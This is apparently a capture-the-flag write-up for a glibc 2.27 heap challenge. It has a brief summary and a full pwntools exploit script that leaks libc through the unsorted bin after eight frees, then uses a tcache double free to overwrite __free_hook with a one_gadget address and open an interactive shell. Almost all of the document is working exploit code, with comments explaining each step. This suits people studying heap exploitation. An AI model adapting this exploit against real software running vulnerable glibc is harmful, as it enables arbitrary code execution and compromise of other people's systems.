Tags: libc-2.27 pwn heap uaf use-after-free tcache-dup
Rating:
Fill the tcache with 7 frees; the 8th free goes into the unsorted bin, which gets you a libc leak.
A normal tcache-dup then overwrites __free_hook with a one_gadget address.
```python
#!/usr/bin/python
from pwn import *
context.update(os='linux', arch='amd64')
# DEBUG echoes every byte sent/received; exploit() depends on prompt framing,
# so this is the first thing to look at when the interaction desyncs.
context.log_level = 'DEBUG'
context.update(terminal=['tmux', 'new-window'])
# Local target; the commented gdb.debug form attaches a debugger to the same binary instead.
p = process('./chall')
# p = gdb.debug('./chall', 'c')
e = ELF('./chall')
# Must be the libc shipped with the challenge: the leak offset and the
# one_gadget offset used in exploit() are specific to that build.
libc = ELF('./libc.so.6')
def prefix(ch):
    """Consume the menu prompt, then send *ch* as one line.

    Used for menu choices, sizes and chunk contents alike; add/view/delete
    drive the binary purely through this helper, which suggests the same
    ">> " prompt precedes every input (confirm against the binary).
    """
    prompt = ">> "
    p.recvuntil(prompt)
    p.sendline(str(ch))
def add(size, data):
    """Menu option 1: allocate a chunk of *size* bytes and fill it with *data*."""
    for field in (1, size, data):
        prefix(field)
def view(index):
    """Menu option 2: print the chunk stored at *index*."""
    for field in (2, index):
        prefix(field)
def delete(index):
    """Menu option 3: free the chunk stored at *index* (no index reset, as the repeated deletes below rely on)."""
    for field in (3, index):
        prefix(field)
def exploit():
    """Run the leak-then-overwrite chain summarised at the top of the write-up.

    Phase 1: chunk 0 (150 bytes) is freed eight times.  glibc 2.27's tcache
    keeps seven entries per size, so the eighth free lands in the unsorted
    bin and view(0) prints a pointer into main_arena; the libc base is
    derived from it.
    Phase 2: chunk 1 (40 bytes) is freed twice (the "tcache-dup"), then
    re-allocated so that the third add() writes a one_gadget address over
    __free_hook; the final delete() triggers it.

    NOTE(review): both primitives are glibc-2.27-specific (see the page
    tags).  Later glibc releases add tcache double-free detection and
    remove __free_hook, and either change alone breaks this chain.
    """
    big = 150
    small = 40
    add(big, "AAA")    # becomes index 0
    add(small, "AAA")  # becomes index 1
    # Seven frees fill the tcache bin for this size; the eighth goes to the unsorted bin.
    for _ in range(8):
        delete(0)
    view(0)
    p.recvline()  # skip the first output line; the pointer is on the second
    leaked = u64(p.recvline().strip().ljust(8, '\x00'))
    # The unsorted-bin pointer sits at __malloc_hook + 112 in this build (the
    # write-up's constant) -- verify against the shipped libc.so.6 if it differs.
    libc.address = leaked - (libc.symbols['__malloc_hook'] + 112)
    # tcache-dup: the same chunk is freed twice, so it is handed out twice below.
    for _ in range(2):
        delete(1)
    add(small, p64(libc.symbols['__free_hook']))
    add(small, p64(0))
    # 0x4f3c2 is the one_gadget offset from the write-up; it is specific to this libc build.
    add(small, p64(0x4f3c2 + libc.address))
    delete(0)  # free() now runs through the overwritten __free_hook
exploit()
# Back to INFO so the interactive session is not flooded with DEBUG hexdumps.
context.update(log_level='INFO')
p.interactive()
```